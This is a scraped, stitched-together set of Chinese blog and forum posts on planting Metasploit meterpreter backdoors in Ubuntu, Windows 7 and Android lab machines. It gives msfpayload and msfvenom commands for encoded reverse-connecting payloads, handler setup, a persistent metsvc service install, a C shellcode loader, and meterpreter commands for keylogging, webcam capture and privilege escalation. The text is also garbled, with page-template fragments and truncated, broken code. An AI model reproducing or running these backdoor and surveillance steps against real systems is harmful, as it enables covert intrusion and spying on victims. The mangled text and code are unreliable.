meterpreter可持续发展成功案例后门,一直不能成功,求解答

温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
&目标主机ubuntu12.04 x86 虚拟机(192.168.0.131)本地主机:192.168.0.1491.生成后门程序:msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai && /root/Desktop/test2.开始监听:msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 E&&将后门程序拷贝到目标主机,改变权限,并执行:&尝试在本地主机切换到root账户,就算输入密码也是切换不了;当本地主机执行切换到root用户的命令后,目标主机也会提示要输入root密码,只有在目标主机输入密码才能在本地主机切换到root!&当目标主机输入root密码之后,本地主机开始切换到root账户:&如果在目标主机以root账户运行后门程序呢?。。。。。&
xiao106347推荐阅读:
阅读(4754)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Metasploit使用后门渗透Ubuntu12.04',
blogAbstract:'&目标主机ubuntu12.04 x86 虚拟机(192.168.0.131)本地主机:192.168.0.1491.生成后门程序:msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.149 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai && /root/Desktop/test2.开始监听:',
blogTag:'metasploit,kali-linux,ubuntu',
blogUrl:'blog/static/',
isPublished:1,
istop:false,
modifyTime:7,
publishTime:9,
permalink:'blog/static/',
commentCount:0,
mainCommentCount:0,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
&目标主机:cn_win7_x86_7601(虚拟机):192.168.0.116本地主机:192.168.0.1491.msfpayload生成后门程序:& & msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x &steup.exe&2.进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀。&3.打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :&4.将程序拷贝到目标主机并执行:&5.后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf):&“meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。”meterpreter常用的命令getsystem & & & &#会自动利用各种各样的系统漏洞来进行权限提升migrate & & & & &#进程id进程迁移background & & & #把当前的会话设置为背景,需要的时候在启用getuid & & & & &#查看对方正在运行的用户ps & #列出所有的进程getpid & & &#返回运行meterpreter的id号sysinfo & & & #产看系统信息和体系结构shell & &#切换到cmd的系统权限方式exit & #退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口run webcam -p /var/www & &#在/var/www目录监控目标主机的摄像头keylog_recorder & #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘。。。更强大的命令请查阅官方文档。&
xiao106347推荐阅读:
阅读(22841)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Metasploit使用后门程序渗透Windows7',
blogAbstract:'&目标主机:cn_win7_x86_7601(虚拟机):192.168.0.116本地主机:192.168.0.1491.msfpayload生成后门程序:& & msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x &steup.exe',
blogTag:'windows,kali-linux,metasploit',
blogUrl:'blog/static/11',
isPublished:1,
istop:false,
modifyTime:8,
publishTime:4,
permalink:'blog/static/11',
commentCount:1,
mainCommentCount:1,
recommendCount:1,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}使用Meterpreter获得后门
&########################使用Meterpreter获得后门####################
入侵成功后,如何建立后门?
强大meterpreter工具,可以提供这种功能。
meterpreter & run metsvc -h
& & -A& && &&&Automatically start a matching multi/handler to connect to the service
-h& && &&&This help menu
-r& && &&&Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter & run metsvc
Creating a meterpreter service on port 31337
Creating a temporary installation directory C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\EkQASdimbMldN&
&&&& Uploading metsrv.dll&
&&&& Uploading metsvc-server.exe&
&&&& Uploading metsvc.exe&
Starting the service&
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
后门建立成功。
########################后门利用########################
后门如何利用啊?
msf & use exploit/multi/handler
msf&&exploit(handler) & set payload windows/metsvc_bind_tcp
payload =& windows/metsvc_bind_tcp
msf&&exploit(handler) & set LPORT 31337
LPORT =& 31337
msf&&exploit(handler) & set RHOST 192.168.200.140
RHOST =& 192.168.200.140
msf&&exploit(handler) & show options&
Module options (exploit/multi/handler):
& &Name&&Current Setting&&Required&&Description
&-&&&&&&&&&&&&&&&&&&
Payload options (windows/metsvc_bind_tcp):
& &Name& && &Current Setting&&Required&&Description
&-& && &&&&&&&&&&&&&&&&&
EXITFUNC&&process& && && & yes& && & Exit technique: seh, thread, process, none
LPORT& &&&31337& && && && &yes& && & The listen port
RHOST& &&&192.168.200.140&&no& && &&&The target address
Exploit target:
& &Id&&Name
0& &Wildcard Target
msf&&exploit(handler) & exploit
Started bind handler
Starting the payload handler&
Meterpreter session 1 opened (192.168.200.148:57009 -& 192.168.200.140:31337) at
02:02:58 -0500
meterpreter &
meterpreter & getuid
Server username: NT AUTHORITY\SYSTEM
【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱,我们会在最短的时间内进行处理。
上一篇:【】【】当前位置: →
→ Metasploit施用笔记-msfvenom生成meterpreter后门代码
Metasploit施用笔记-msfvenom生成meterpreter后门代码
& 作者:佚名 & 来源: 互联网 & 热度:
&收藏到→_→:
摘要: Metasploit应用笔记-msfvenom生成meterpreter后门代码1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reve...
"Metasploit施用笔记-msfvenom生成meterpreter后门代码"::
metasploit应用笔记-msfvenom生成meterpreter后门代码1 用msfvenom生成c语言格式的shellcode.
windows/meterpreter/reverse_http是shellcode, x86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,lhost lport是shellcode要使用的参数,表示shellcode运行是连接的ip地址和端口。-f c 指定shellcode的c语言格式。也可以使用-f exe 直接输出可执行的exe文件。
2 在c程序中调用shellcode:
unsigned char buf[] =
&\xd9\xf6\xbe\xb2\x7c\x9f\x62\xd9\x74\x24\xf4\x5f\x29\xc9\xb1&;
int _tmain(int argc, _tchar* argv[])
void (*fun)();
*(int*)&fun = (int)
printf(&execute meterpreter shellcode.....\n&);
3 在attacker电脑上启动metasploit 控制台:msfcosole. 如图:
解释一下命令
msf & use exploit/multi/handler & & & & &
& &&使用exploit/multi/handler监听连入的backdoor
msf &exploit(handler) & set payload windows/meterpreter/reverse_http & & & & & &设置对应的payload。payload就是shellcode的意思。
msf &exploit(handler) & show options & & & & & & & & & & &
&&显示所有的设置
如果需要的话,可能还需要将lhost,lport,设置成与shellcode中相同的地址和端口。
4 最后在attacker电脑上运行exploit命令,一旦有backdoor连进来,就可以用命令来控制目标了。
搜索此文相关文章:此文来自: 马开东博客
网址: 站长QQ
上一篇:没有了
Metasploit施用笔记-msfvenom生成meterpreter后门代码_ASP相关文章
ASP_总排行榜
ASP_月排行榜
ASP_周排行榜
ASP_日排行榜
马开东博客专栏
企业软件/开发
硬件/嵌入开发
马开东博客专栏
应用服务器
软件工程/管理/测试
马开东博客专栏
Linux/Unix
马开东博客专栏
开发语言/框架
专题开发/技术/项目
马开东博客专栏
高性能开发
马开东博客专栏温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!&&|&&
LOFTER精选
网易考拉推荐
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
1.安卓后门程序生成命令:&&2.打开msfuse exploit/mutli/handlerset payload android/meterpreter/reverse_tcpset LHOSTset srvhost&3.查看设置,无误后开始exploit;同时将后门程序发送到目标主机安装并运行:&&&
xiao106347推荐阅读:
阅读(11421)|
用微信&&“扫一扫”
将文章分享到朋友圈。
用易信&&“扫一扫”
将文章分享到朋友圈。
历史上的今天
loftPermalink:'',
id:'fks_',
blogTitle:'Metasploit使用后门渗透android4',
blogAbstract:'1.安卓后门程序生成命令:&&2.打开msf',
blogTag:'metasploit,kali-linux,android',
blogUrl:'blog/static/89',
isPublished:1,
istop:false,
modifyTime:2,
publishTime:0,
permalink:'blog/static/89',
commentCount:21,
mainCommentCount:5,
recommendCount:0,
bsrk:-100,
publisherId:0,
recomBlogHome:false,
currentRecomBlog:false,
attachmentsFileIds:[],
groupInfo:{},
friendstatus:'none',
followstatus:'unFollow',
pubSucc:'',
visitorProvince:'',
visitorCity:'',
visitorNewUser:false,
postAddInfo:{},
mset:'000',
remindgoodnightblog:false,
isBlackVisitor:false,
isShowYodaoAd:false,
hostIntro:'',
hmcon:'1',
selfRecomBlogCount:'0',
lofter_single:''
{list a as x}
{if x.moveFrom=='wap'}
{elseif x.moveFrom=='iphone'}
{elseif x.moveFrom=='android'}
{elseif x.moveFrom=='mobile'}
${a.selfIntro|escape}{if great260}${suplement}{/if}
{list a as x}
推荐过这篇日志的人:
{list a as x}
{if !!b&&b.length>0}
他们还推荐了:
{list b as y}
转载记录:
{list d as x}
{list a as x}
{list a as x}
{list a as x}
{list a as x}
{if x_index>4}{break}{/if}
${fn2(x.publishTime,'yyyy-MM-dd HH:mm:ss')}
{list a as x}
{if !!(blogDetail.preBlogPermalink)}
{if !!(blogDetail.nextBlogPermalink)}
{list a as x}
{if defined('newslist')&&newslist.length>0}
{list newslist as x}
{if x_index>7}{break}{/if}
{list a as x}
{var first_option =}
{list x.voteDetailList as voteToOption}
{if voteToOption==1}
{if first_option==false},{/if}&&“${b[voteToOption_index]}”&&
{if (x.role!="-1") },“我是${c[x.role]}”&&{/if}
&&&&&&&&${fn1(x.voteTime)}
{if x.userName==''}{/if}
网易公司版权所有&&
{list x.l as y}
{if defined('wl')}
{list wl as x}{/list}

我要回帖

更多关于 可持续发展成功案例 的文章

 

随机推荐